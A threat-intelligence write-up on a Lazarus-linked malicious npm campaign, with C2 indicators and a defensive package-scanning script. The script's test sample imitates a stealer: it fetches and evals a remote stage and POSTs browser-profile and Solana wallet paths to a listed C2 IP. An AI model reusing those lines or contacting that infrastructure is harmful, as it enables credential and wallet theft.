Lazarus Expands Malicious npm Campaign: 11 New Packages Add Malware Loaders and Bitbucket Payloads

2025-04-04 Socket

https://socket.dev/blog/lazarus-expands-malicious-npm-campaign-11-new-packages-add-malware-loaders-and-bitbucket


Socket identifies 11 additional malicious npm packages tied to North Korea’s Contagious Interview operation and Lazarus-linked infrastructure, extending the earlier BeaverTail activity with new RAT loader behavior. The packages impersonated developer utilities, were published from both new and previously observed npm accounts, and collectively drew more than 5,600 downloads before most of the accounts were suspended or reported. Several samples reused known C2 infrastructure (144.172.87[.]27, 45.61.151[.]71, and 185.153.182[.]241), scanned browser profiles, targeted Solana private-key material, and exfiltrated the collected data over HTTP POST. The campaign also staged content in GitHub and Bitbucket repositories, obfuscated strings with hex encoding, executed fetched payloads dynamically, deployed BeaverTail, and contained references to InvisibleFerret, reinforcing the supply-chain risk to developers targeted through fake hiring lures and open-source package ecosystems.

Indicators of Compromise

Type    Value                              First Seen   Last Seen
IPv4    45.61.151.71                       2025-04-04   2025-11-13
IPv4    185.153.182.241                    2025-01-29   2025-11-13
URL     https://m21gk.wiremockapi.cloud…   2025-04-04   2025-05-13
URL     https://mocki.io/v1/32f16c80-60…   2025-04-04   2025-05-13
DOMAIN  m21gk.wiremockapi.cloud            2025-04-04   2025-05-13
IPv4    144.172.87.27                      2025-04-04   2025-04-04
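The tradecraft summarized above (hex-encoded strings, dynamic execution of payloads fetched from GitHub or Bitbucket, browser-profile scanning, Solana key theft, HTTP POST exfiltration) and the IOC table lend themselves to a quick static triage check on a package before it is installed. The script below is an added example, not Socket's tooling and not code from any of the packages: it decodes hex-obfuscated string literals in a package's JavaScript, extracts IPs and URLs from the decoded text, applies a few keyword heuristics, and matches the result against the IOCs listed above. The sample package source it scans is constructed for the demonstration; the browser-profile and Solana keypair paths in the heuristics are assumptions about what such a stealer touches, not details from the page; and because the page truncates the two URL IOCs, they are matched on their visible prefixes only.

```javascript
// Added example (not Socket's code): static triage of an npm package's JavaScript
// for the tradecraft summarized above. It decodes hex-obfuscated strings, pulls out
// IPs and URLs, applies keyword heuristics, and matches against the page's IOCs.
// Heuristic only: a 'clean' result does not prove a package is safe.
'use strict';

// IOC values copied from the table above. The two URLs are truncated on the page,
// so only their visible prefixes are used.
const IOC_IPS = new Set(['45.61.151.71', '185.153.182.241', '144.172.87.27']);
const IOC_DOMAINS = new Set(['m21gk.wiremockapi.cloud']);
const IOC_URL_PREFIXES = ['https://m21gk.wiremockapi.cloud', 'https://mocki.io/v1/32f16c80-60'];

// Decode \xNN escape sequences in place ("\x68\x74\x74\x70" -> "http").
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Find quoted literals made only of hex digits (e.g. Buffer.from('6874...', 'hex'))
// and return those that decode to printable ASCII.
function decodeBareHex(src) {
  const out = [];
  const re = /['"`]([0-9a-fA-F]{8,})['"`]/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    if (m[1].length % 2 !== 0) continue;
    const text = Buffer.from(m[1], 'hex').toString('latin1');
    if (/^[\x20-\x7e\t\r\n]+$/.test(text)) out.push(text);
  }
  return out;
}

const IPV4_RE = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;
const URL_RE = /https?:\/\/[^\s'"`)]+/g;

// Keyword heuristics. The browser-profile and Solana paths are assumptions about
// what such a stealer would read, not indicators taken from the page.
const HEURISTICS = [
  { name: 'dynamic-exec',    re: /\beval\s*\(|new\s+Function\s*\(|vm\.runIn\w*Context|child_process/ },
  { name: 'payload-host',    re: /(?:raw\.githubusercontent\.com|github\.com|bitbucket\.org)\/[^\s'"`]+/ },
  { name: 'browser-profile', re: /User Data|Local Storage|leveldb|google-chrome|BraveSoftware/ },
  { name: 'solana-key',      re: /\.config[\\\/]solana[\\\/]id\.json|\bsolana\b/i },
  { name: 'http-post',       re: /method\s*:\s*['"]POST['"]|\.post\s*\(/ },
];

function triagePackageSource(src) {
  const bare = decodeBareHex(src);
  const decoded = decodeHexEscapes(src) + '\n' + bare.join('\n');

  const findings = HEURISTICS.filter((h) => h.re.test(decoded)).map((h) => h.name);
  if (/\\x[0-9a-fA-F]{2}/.test(src) || bare.length > 0) findings.push('hex-encoded-strings');

  const ips = [...new Set(decoded.match(IPV4_RE) || [])];
  const urls = [...new Set(decoded.match(URL_RE) || [])];

  const iocHits = new Set(ips.filter((ip) => IOC_IPS.has(ip)));
  for (const u of urls) {
    let host;
    try { host = new URL(u).hostname; } catch { continue; }
    if (IOC_IPS.has(host) || IOC_DOMAINS.has(host) || IOC_URL_PREFIXES.some((p) => u.startsWith(p))) {
      iocHits.add(u);
    }
  }

  // Known infrastructure, or obfuscation combined with dynamic execution, is enough
  // to block; any other finding goes to manual review.
  let verdict = 'clean';
  if (iocHits.size > 0 || (findings.includes('hex-encoded-strings') && findings.includes('dynamic-exec'))) {
    verdict = 'block';
  } else if (findings.length > 0) {
    verdict = 'review';
  }
  return { verdict, findings, ips, urls, iocHits: [...iocHits] };
}

// Constructed sample imitating the described loader behaviour; not code from any real package.
// The \xNN string decodes to http://45.61.151.71/upload and the bare hex string to a
// made-up Bitbucket raw URL.
const SAMPLE_MALICIOUS = [
  "const os = require('os'), path = require('path');",
  "const c2 = '\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x34\\x35\\x2e\\x36\\x31\\x2e\\x31\\x35\\x31\\x2e\\x37\\x31\\x2f\\x75\\x70\\x6c\\x6f\\x61\\x64';",
  "const stage = Buffer.from('68747470733a2f2f6269746275636b65742e6f72672f782f792f7261772f6d61696e2f6c6f616465722e6a73', 'hex').toString();",
  "const chrome = path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data');",
  "const wallet = path.join(os.homedir(), '.config/solana/id.json');",
  "fetch(stage).then((r) => r.text()).then((code) => eval(code));",
  "fetch(c2, { method: 'POST', body: JSON.stringify({ chrome, wallet }) });",
].join('\n');

const SAMPLE_BENIGN = 'module.exports = function add(a, b) { return a + b; };';

console.log(JSON.stringify(triagePackageSource(SAMPLE_MALICIOUS), null, 2));
console.log('benign verdict:', triagePackageSource(SAMPLE_BENIGN).verdict);
```

To run it against a real candidate, fetch the tarball with `npm pack <name>` without installing, extract it, and pass the contents of each .js file to triagePackageSource. Treat a 'review' verdict as a prompt for dynamic analysis in an isolated environment, not as a pass; postinstall scripts in package.json deserve the same scrutiny as the JavaScript itself.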
